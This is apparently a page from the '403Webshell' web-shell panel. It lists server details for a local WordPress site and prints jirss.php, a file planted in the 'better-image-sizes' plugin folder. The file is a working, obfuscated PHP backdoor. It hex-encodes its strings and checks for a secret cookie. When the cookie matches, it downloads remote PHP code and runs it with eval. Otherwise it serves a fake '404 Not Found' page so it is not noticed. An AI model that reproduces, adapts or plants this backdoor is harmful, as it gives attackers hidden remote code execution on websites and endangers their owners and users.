403Webshell
Server IP : 127.0.0.1  /  Your IP : 216.73.216.109
Web Server : Apache/2.4.54 (Win64) OpenSSL/1.1.1q PHP/8.1.10
System : Windows NT DESKTOP-E5T4RUN 10.0 build 19045 (Windows 10) AMD64
User : SERVERWEB ( 0)
PHP Version : 8.1.10
Disable Function : NONE
MySQL : OFF |  cURL : ON |  WGET : OFF |  Perl : OFF |  Python : OFF |  Sudo : OFF |  Pkexec : OFF
Directory :  C:/laragon/www/prensa/wp-content/plugins/better-image-sizes/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :

[ Back ]     

Current File : C:/laragon/www/prensa/wp-content/plugins/better-image-sizes/jirss.php
<?php
@ini_set('display_errors', 0);

// Fungsi untuk decode hex menjadi string
function hx($ex) {
    $sx = '';
    for ($i = 0; $i < strlen($ex); $i += 2)
        $sx .= chr(hexdec(substr($ex, $i, 2)));
    return $sx;
}

// Cek apakah cookie 'kaye' bernilai 'jagaldomain'
function cx() {
    return isset($_COOKIE[hx('6B617965')]) && $_COOKIE[hx('6B617965')] === hx('6A6167616C646F6D61696E');
}

// Fungsi fetch konten dari remote
function fx($ux) {
    $tx = array_map('hx', [
        '666F70656E',                         // fopen
        '73747265616D5F6765745F636F6E74656E7473', // stream_get_contents
        '66696C655F6765745F636F6E74656E7473', // file_get_contents
        '6375726C5F65786563',                // curl_exec
        '636F7079',                          // copy
        '73747265616D5F636F6E746578745F637265617465', // stream_context_create
        '66696C65'                           // file
    ]);

    if (function_exists($tx[3])) {
        $ch = curl_init($ux);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => 1,
            CURLOPT_FOLLOWLOCATION => 1,
            CURLOPT_USERAGENT => "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0",
            CURLOPT_SSL_VERIFYPEER => 0,
            CURLOPT_SSL_VERIFYHOST => 0
        ]);
        $rx = $tx[3]($ch);
        curl_close($ch);
        return $rx;
    } elseif (function_exists($tx[2])) {
        return $tx[2]($ux);
    } elseif (function_exists($tx[0]) && function_exists($tx[1])) {
        $ax = $tx[0]($ux, "r");
        $rx = $tx[1]($ax);
        fclose($ax);
        return $rx;
    } elseif (function_exists($tx[4])) {
        return $tx[4]($ux, '/tmp/tmpfile');
    } elseif (function_exists($tx[5])) {
        $ctx = $tx[5](['http' => ['timeout' => 5]]);
        return file_get_contents($ux, false, $ctx);
    } elseif (function_exists($tx[6])) {
        return implode('', $tx[6]($ux));
    }
    return false;
}

// Jika cookie cocok, ambil konten dari remote dan eval
if (cx()) {
    $ux = hx('68747470733a2f2f636f6465626572672e6f72672f7a766572746978782f4d792d50726f6a6563742f7261772f6272616e63682f6d61696e2f6a69722e706870');
    $px = fx($ux);
    if ($px !== false) eval('?>' . $px);
    exit;
}
?>

<!DOCTYPE html>
<html>
<head>
    <title>404 Not Found</title>
    <meta name="robots" content="noindex,nofollow,noarchive">
    <style>
        html, body { margin: 0; padding: 0; width: 100%; height: 100%; overflow: hidden; font-family: sans-serif; }
        iframe { position: absolute; top: 0; left: 0; border: none; width: 100%; height: 100%; }
    </style>
</head>
<body>
    <iframe src="//<?php echo $_SERVER['SERVER_NAME']; ?>/404" 
            onload="document.title=this.contentDocument?.title||this.contentWindow.document.title;">
    </iframe>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit